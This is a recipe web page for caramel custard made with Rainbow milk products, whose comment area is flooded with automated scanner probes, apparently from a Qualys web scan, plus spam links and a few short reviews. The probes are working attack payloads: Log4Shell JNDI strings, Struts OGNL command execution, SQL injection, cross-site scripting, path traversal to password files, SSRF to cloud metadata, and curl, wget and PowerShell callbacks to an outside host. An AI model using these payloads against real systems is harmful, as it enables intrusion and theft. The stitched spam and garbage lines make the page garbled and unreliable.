Stir together the sugar and ¼ cup water in a small heavy saucepan. Bring to boil over medium-high heat and cook until the mixture begins to turn golden. Pour the caramel into a mini loaf pan. Set the loaf pan aside.
Whisk the eggs and yolks in a large bowl until combined. Add the Rainbow sweetened condensed milk, Rainbow evaporated milk, whole milk, vanilla, and salt and whisk until incorporated.
Strain the mixture through a fine-mesh strainer into a large bowl to remove any bits of egg, then pour the strained custard into the loaf pan over the caramel.
Cover the loaf pan tightly with aluminum foil.
Pour hot water around the loaf pan until it reaches about halfway up the sides of the loaf pan. Bake at 148°c for 40 minutes.
Carefully remove the pans from the oven. Remove the foil and Cover tightly with plastic wrap and chill in the fridge overnight or up to 4 days.
Flip caramel cream on the plate and serve it.
292 Kcal
Full NutritionClick a picture and mention
@RainbowMilk
or tag us
#RainbowKitchenMagic
in Instagram or Twitter
If the addition of Rainbow evaporated milk has you doubting this recipe, never fear. add it and enjoy it.
The nice classic Italian no-bake dessert that has a mixture of great tastes all together in one simple recipe.
Here is a cake that is easy to prepare and in simple steps using Rainbow Chocolate Sweetened Condensed Milk
1
1
1
1
1
1
1
1
1
1
1
1
1
1 and false() and 'or' = 'and'
1 or true() or 'and' = 'and'
1
1
1
1
1
1
1
1
1
1
1
1
1
11 or 11=12
11 or 11=11
1
1
1
1' and 'tpklq'='xqlkp
1' or 'tpklq'='tpklq
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1 and 4325=2728 --
1
1
1
1
1
1
1') and 2634=1123 --
1
1
1
1
1
1
1
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('wget http://a0e364589f38978bea8dda4d20041840cadc94cc.1523145317359663.1872819839.oscomm15019101.oscomm.eu1.qualysperiscope.com.').read() }}
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://0da81f561a46e3d7cafbe901743db6008bcb1b8b.1523145317359663.2021905764.oscomm27.oscomm.eu1.qualysperiscope.com.')}
1
1
1
1
1
1
${url:UTF-8::https://e7b586ee1a98476299e143ac182ecce53c88105b.1523145317359663.3887713567.oscomm25.oscomm.eu1.qualysperiscope.com./}
1
1
1
1
${url:UTF-8::http://b82fecc500db5c97551b120fc873c47dc8d395cd.1523145317359663.2797838500.oscomm24.oscomm.eu1.qualysperiscope.com.}
1
1
1
1
${url:UTF-8:https://2b764f4a0d123378d8055cefbe96229ab2027f76.1523145317359663.2368037417.oscomm23.oscomm.eu1.qualysperiscope.com.}
1
1
${url:UTF-8:http://0d61a8f298f36aa8cae847ebc941613386a5cbc4.1523145317359663.122336536.oscomm22.oscomm.eu1.qualysperiscope.com.}
1
1
1
${dns:address|67fa2164f3f71c0173503685074e41438ea2d847.1523145317359663.3090613491.oscomm21.oscomm.eu1.qualysperiscope.com.}
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://f0be9cd073f99ad6029af8a31e70d19a9debb9f8.1523145317359663.3764464079.oscomm20.oscomm.eu1.qualysperiscope.com.')}
1
1
1
${url:UTF-8:https://05847f3e79757d4b8ce4bb6a20449d56cc8eb647.1523145317359663.1777744348.oscomm19.oscomm.eu1.qualysperiscope.com./}
1
1
1
1
${url:UTF-8:http://9b2ae72e84714163d7041d3a2eed75d46d6e8a27.1523145317359663.688345274.oscomm18.oscomm.eu1.qualysperiscope.com./}
1
1
${url:UTF-8::https://dfd82ac023d7b5fc00371335c3af775b84386359.1523145317359663.3384346302.oscomm17.oscomm.eu1.qualysperiscope.com./}
1
1
1
${url:UTF-8::https://c6e1923750cb74e3e2ce57237b7b2cffa82d0f2b.1523145317359663.1617674705.oscomm16.oscomm.eu1.qualysperiscope.com./Qualyswas}
1
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://@CIPHER@.@UNIQUEID@.@URI@.oscomm15.oscomm.@DOMAIN@')}
1
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('curl https://e7474bbe79808e20f122815b496de6b197371151.1523145317359663.2007344329.oscomm14.oscomm.eu1.qualysperiscope.com.')}
1
1
1
1
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri https://6263c5b2ef40b7804bb1098671004d03ed44689a.1523145317359663.2286839542.oscomm12.oscomm.eu1.qualysperiscope.com.')}
1
1
1
1
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('powershell -c iwr -uri http://a5748278d2a1f4c13b7e85650c68876c1e14f1de.1523145317359663.2441055442.oscomm10.oscomm.eu1.qualysperiscope.com.')}
1
1
1
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}
1
1
1
${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}
1
1
1
1
${url:UTF-8:https://f3a77e378da0a3128f4b285d555fb563d11da45a.1523145317359663.1995767358.oscomm07.oscomm.eu1.qualysperiscope.com.}
1
1
1
1
${url:UTF-8:http://e4bdf82508c3956975a1720add3885bf5a235c62.1523145317359663.869463722.oscomm06.oscomm.eu1.qualysperiscope.com.}
1
1
1
1
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D
1
1
1
1
${dns:address|eed8fe372c4a043424b3867c9d38a814ec7c1535.1523145317359663.1457093420.oscomm04.oscomm.eu1.qualysperiscope.com.}
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://@CIPHER@.@UNIQUEID@.@URI@.oscomm03.oscomm.@DOMAIN@')}
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec('curl http://ee6de8b98d32ce31c1f19eb21f737c3999562000.1523145317359663.3795509148.oscomm02.oscomm.eu1.qualysperiscope.com.')}
1
1
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://9c261899e535657983a59c279a2de18ff8e60739.1523145317359663.884101388.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://679fe8f9aae421633b05e5a063af9a37fe4f6dc1.1523145317359663.4065473924.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//1b3125037900ce60454970742cf22e5109c1fd6b.1523145317359663.1271029463.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jndi:dns://924ea46cf622739ba785740b873d8edb021bea3f.1523145317359663.1155268685.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//aad6c66c493d6a3674c44fe31e5605408db6e612.1523145317359663.3170070127.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jnd${123%ff:-${123%ff:-i:}}ldap://0835cfc7e3d3c7a758d4fe481acaa31bd88ba635.1523145317359663.3493693662.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${j${::-n}di:ldap${::-:}//f87ebd990cde3072282e83a60db86a227f8237ad.1523145317359663.1710158108.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://c969cbaf9598f9c5918aadd7b458c094dfa49b2d.1523145317359663.2809206209.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://f8a6643c0f4f6224a78fbe91ada3f864ce69e992.1523145317359663.1062401354.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${jndi:rmi://eb31997ecf8d64f2533ee8c3eda88a968021ff63.1523145317359663.2178349668.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jndi:ldap://3a11a332570ed3cc3dc1b10abebc7a515629d6d5.1523145317359663.941521998.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
1
1
1
http://2ea6710d82fb9e311733f12179f56242b72da341.1523145317359663.2708986990.ssrf01.ssrf.eu1.qualysperiscope.com.
1
1
1
1
Joe+ bcc:was_engine@f19d3c600321dcce2edde129faa720ba05aaf4ab.1523145317359663.1037769574.smtphi01.smtp.eu1.qualysperiscope.com.
1
1
1
1
http://169.254.169.254/latest/meta-data/
1
1
1
1
</script><script>function(){qxssczvZVNZY};</script>
1
1
1
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
1
1
1
1
1
1
1
1
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
1
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
1
1
1
"-qxssit2c1TF0()-"
1
1
1
1
1
'-qxssmTxK05o8()-'
1
1
*/;(function(){qxss63ekgbFk});/*
1
1
1
9 ;(function(){qxssXys877fy});//
1
1
1
1
1
1
1
1
1
';(function(){qxssk5SULyXR});/**/'
1
1
1
1
qualys(aqxssWST5B6mr)xyz
1
1
1
1
");(function(){qxssqZXgJ7lP});/**/"
1
1
1
1
1
";(function(){qxss4Nsqo6xG});/**/"
1
1
1
javascript:qxss(X154405448Y7_2Z);
1
1
1
1
http://rfitest/
1
1
1
1
1
|netstat -an
1
1
1
a(){}phpinfo(); function a
1
1
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
1
1
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
../../../../../../../Windows/System32/drivers/etc/hosts�
1
1
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
1
1
//....//....//....//....//....//....//....//etc/passwd�
1
1
1
1
1
1
1
1
1
1
../../../../../../../etc/passwd�
1
1
1
/../../../../../../../etc/passwd�
1
1
1
/../../../../../../../etc/passwd
1
1
1
1
�
1
1
1
1
1e309
1
1
(
1
1
,
1
1
1
1
``
1
1
1
/*
1
1
#
1
1
1
;--
1
1
1
1'
1
1
1
1
qualys<esi:comment text="" />was<!--esx-->esi
1
1
1
1
1
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
1
< script a=4>qssuN0wSEVT=7< /script>
1
1
1
1
" onEvent=X154405448Y7_2Z
1
1
1
' onEvent=X154405448Y7_2Z
1
1
1
1
1
1
1
1
1
<STYLE type="text/css" a=3>BODY{background:url("javascript:qssbeL6bMQm=7")}</STYLE>
1
1
1
1"><DIV STYLE="width:expression(qss17bJp4fB=7)">
1
1
1
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qssle35S1h6=7">
1
1
1
<IMG SRC=javascript:qss0nSG9TsX=7>
1
1
1
1
1
1
1
1
1
1
1
1
1
1
<script =">" SRC=//localhost/j7Pb94vrc>
1
1
1
<script src=//localhost/jy35T7iU9>
1
1
1
1 <script>_q_q=random(hjs61h5v)</script>
1
1
1
<script>_q=random(X154405448Y7_2Z)</script>
1
1
1
1
�<script>_q=random(X154405448Y7_2Z)</script>
1
1
1
1
1
"'><qss5Q7D8B60 `;!--=&{()}>
1
1
1
1
z--><qssj281YM15>
1
1
1
1
1"'><qssQ7h4buj2>
1
1
1
1
1
"><qssuQKU7I6F>
1
1
1
1
javascript:qxss(X154405448Y7_2Z);
1
1
1
1
" onEvent=X154405448Y7_2Z
1
1
1
1
1
1
1
�<script>_q=random(X154405448Y7_2Z)</script>
1
1
1
1
1
"'><qss a=X154405448Y7_2Z>
1
1
1
1
It also used to slow or stop the spread of hormone receptor positive breast cancer in both pre and postmenopausal women <a href=http://buylasixon.com/>lasix and bp</a>
gay univere men chat [url="https://chatcongays.com"]gay chat phone[/url] gay cam chat avenue
oc gay chat rooms arab friends gay webcam chat <a href="https://free-gay-sex-chat.com/">westchester gay chat rooms </a>
1
1
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1
1
1
1'; var djci=sleep(29*1000) + '
1
1
1
1
1
1'; var djci=sleep(29*1000);//
1
1
1
1
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1
1
1;SELECT sleep(29); --
1
1
1
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1
1
1
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1
1
1
1');WAITFOR DELAY '00:00:29'--
1
1
1
1
1';WAITFOR DELAY '00:00:29'--
1
1
1
1
1
1
1;WAITFOR DELAY '00:00:29';
1
1
1WAITFOR DELAY '00:00:29'
1
1
1
1
1
1
|ping -c2 -i91 localhost
1
1
1
ping -c2 -i91 localhost
1
1
1
1
aaaa&ping -n 92 localhost&
1
1
1
1
1
1
1
1" or true() or "and" = "and
1
1
1
1
1
1
1 and false() and 'or' = 'and'
1
1
1
1
1
1
1
1
1' or true() or 'and' = 'and
1
1
15 oR 9=8 + 1
1
1
1
1
1
1
1
1
1
1' or 'tpklq'='tpklq
1
1
1
1
1') and 'swqtp'='ptqws
1
1
1
1
1
1
1 aND 7248=2491 + 4757
1
1
1
1
1
1
1
1
1
1
1
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1 or 4325=4325 --
1
1
1
1
1
1
1
1
1') and 2634=1123 --
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://1f4cc0504a8b6cb88676085becdd86bd0a70f3b0.1447543917359663.900542173.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
1
1
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//959ed45b3d4fcffa3b2366a0e1c0476ef1d6e810.1447543917359663.3527420217.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jndi:dns://a397e183b87a316a4292c0fa26011b3665a1b8fa.1447543917359663.744021073.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//c25a85aae0a4dabe9016aeebc0f359ba1116f9eb.1447543917359663.2518145609.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jnd${123%ff:-${123%ff:-i:}}ldap://33df05f273d169cdb9bd6cba919e4420cf3e1a27.1447543917359663.2144089550.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${j${::-n}di:ldap${::-:}//0f0d22f41747a3526480ae8b111e069460049ef9.1447543917359663.944673790.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://e65cbe22808210594d129ba8d3c2f534a814f864.1447543917359663.3051823761.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://09646d50abb30092ebd4442b8dd0670c182529c2.1447543917359663.2673315276.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
${jndi:rmi://3403750df7efe0d9f53c5e48d254ccd2c558a16b.1447543917359663.1731979337.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
1
${jndi:ldap://0661056b8501c4d5c81d2b456d9f6689ff865179.1447543917359663.1436965645.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}
1
1
1
ping -c 2 b2aa5e27fba47dea00b0b1f8f1235bf80267e573.1447543917359663.2977940476.oscomm01.oscomm.eu1.qualysperiscope.com.
1
1
1
1
1
1
Joe+ bcc:was_engine@683e9cac29380b79486651c290ac58052ebb0dcb.1447543917359663.4294876594.smtphi01.smtp.eu1.qualysperiscope.com.
1
1
1
http://169.254.169.254/latest/meta-data/
1
1
1
1
</script><script>function(){qxss8q68oMTh};</script>
1
1
1
<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->
1
1
1
1
1
1
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
1
1
1
"-qxss89Aw2IF8()-"
1
1
'-qxss30e2261i()-'
1
*/;(function(){qxss410C08s3});/*
1
1
1
9 ;(function(){qxssoSg1SN0g});//
1
1
1
9;(function(){qxssHD3ePjq9});//
1
1
1
1
';(function(){qxssv5GZn0FD});/**/'
1
1
1
1
1
1
");(function(){qxssDIbxNTn7});/**/"
1
1
1
1
";(function(){qxss8fSh4EUo});/**/"
1
1
1
javascript:qxss(X170842728Y7_2Z);
1
1
1
http://rfitest/
1
1
1
1
1
|netstat -an
1
1
1
a(){}phpinfo(); function a
1
1
1
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
1
../../../../../../../Windows/System32/drivers/etc/hosts�
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
1
1
1
//....//....//....//....//....//....//....//etc/passwd�
1
1
1
1
1
//..//..//..//..//..//..//..//etc/passwd�
1
1
1
1
../../../../../../../etc/passwd�
1
1
1
/../../../../../../../etc/passwd�
1
1
1
1
/../../../../../../../etc/passwd
1
1
1
1
1
1
1
1e309
1
1
1
1
1
(
1
1
1
1
,
1
1
1
1
``
1
1
1
1
1
/*
1
1
1
#
1
1
1
1
1
1
1
1
1'
1
1
1
qualys<esi:comment text="" />was<!--esx-->esi
1
1
1
1
1
1
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
<script src=http://localhost/j
1
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
1
< script a=4>qss2Y9Y5hd8=7< /script>
1
1
1
1
1
" onEvent=X170842728Y7_2Z
1
1
1
1
' onEvent=X170842728Y7_2Z
1
1
1
"'><qss a=X170842728Y7_2Z>
1
1
1
<EMBED SRC=//localhost/q15ci10OT.swf AllowScriptAccess=always></EMBED>
1
1
1
1
<STYLE type="text/css" a=3>BODY{background:url("javascript:qssSZ5qsMSG=7")}</STYLE>
1
1
1
1
1"><DIV STYLE="width:expression(qssMZXj7wuQ=7)">
1
1
1
1
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qssYTm8R8FA=7">
1
1
1
<IMG SRC=javascript:qssdq1AlCQL=7>
1
1
"'><<SCRIPT a=2>qssHU15N66N=7;//<</SCRIPT>
1
1
1
1
<SCRIPT/QSSK1Q3U2Tx SRC=//localhost/j>
1
1
1
1
1
1
1
1
1
1
1
1 <script>_q_q=random(9JAAf845)</script>
1
1
1
1
<script>_q=random(X170842728Y7_2Z)</script>
1
1
1
�<script>_q=random(X170842728Y7_2Z)</script>
1
1
1
1
1
"'><qssm33DffZP `;!--=&{()}>
1
1
1
1
z--><qssIQs0SO92>
1
1
1
1"'><qss3kV55zSp>
1
1
"><qss4k5VFv8X>
1
1
1
javascript:qxss(X170842728Y7_2Z);
1
1
1
1
1
" onEvent=X170842728Y7_2Z
1
1
1
1
' onEvent=X170842728Y7_2Z
1
1
1
1
1
"'><qss a=X170842728Y7_2Z>
1
1
1
1
1
1
1
1
1
1
1
1
1
1WAITFOR DELAY '00:00:29'
1
1
|ping -c2 -i91 localhost|
1
1
1
1
1
1
1
ping -c2 -i91 localhost
1
1
aaaa&ping -n 92 localhost&
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
ping -c 2 35a20a6ad19d81e049a8c162d9e0f19ba36f0200.1430694317359663.2209570882.oscomm01.oscomm.eu1.qualysperiscope.com.
1
1
1
1
http://0008865ec55ef594fe3d5a0def4ca0ab9a600c88.1430694317359663.1459880869.ssrf01.ssrf.eu1.qualysperiscope.com.
1
1
1
1
(23.0231*213.759)
1
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
1
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>
1
1
1
1
"-qxss5QFWzvno()-"
1
1
1
1
'-qxss65hjlUVm()-'
1
1
1
*/;(function(){qxssinJ6Fa5R});/*
1
1
1
9 ;(function(){qxssT6i9L75v});//
1
1
9;(function(){qxss6o8wHLNy});//
1
1
1
1
1
qualys(aqxssFFCB0yxZ)xyz
1
1
1
1
");(function(){qxss5UO5NOCB});/**/"
1
1
1
";(function(){qxss69coDe8X});/**/"
1
1
1
1
javascript:qxss(X174975660Y7_2Z);
1
1
1
1
1
1
1
1
|netstat -an
1
1
1
a(){}phpinfo(); function a
1
1
1
1
../../../../../../../Windows/System32/drivers/etc/hosts�
1
1
1
1
1
1
1
1
1
1
1
1
1
1
../../../../../../../etc/passwd�
1
1
1
/../../../../../../../etc/passwd�
1
1
1
1
/../../../../../../../etc/passwd
1
1
1
�
1
1e309
1
1
1
(
1
1
1
1
,
1
1
1
``
1
1
1
/*
1
#
1
1
;--
1
1
1
1'
1
1
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
<script src=http://localhost/j
1
1
1
1
1
< script a=4>qssXdQL6o7L=7< /script>
1
1
1
" onEvent=X174975660Y7_2Z
1
1
1
1
1
1
1
1
1
1
1
1
<SCRIPT/QSS8sAc6Tb0 SRC=//localhost/j>
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
<script>_q=random(X174975660Y7_2Z)</script>
1
1
1
1
1
1
1
1"'><qsspfU5fvp3>
1
1
1
1
1
1
1
1
javascript:qxss(X174975660Y7_2Z);
1
1
1
1
1
1
1
1
1
�<script>_q=random(X174975660Y7_2Z)</script>
1
1
1
1
1
1
1
1
yummmm....
tasty
I loved it! It was delicious.
I tried many recipes but this one is just WOW...
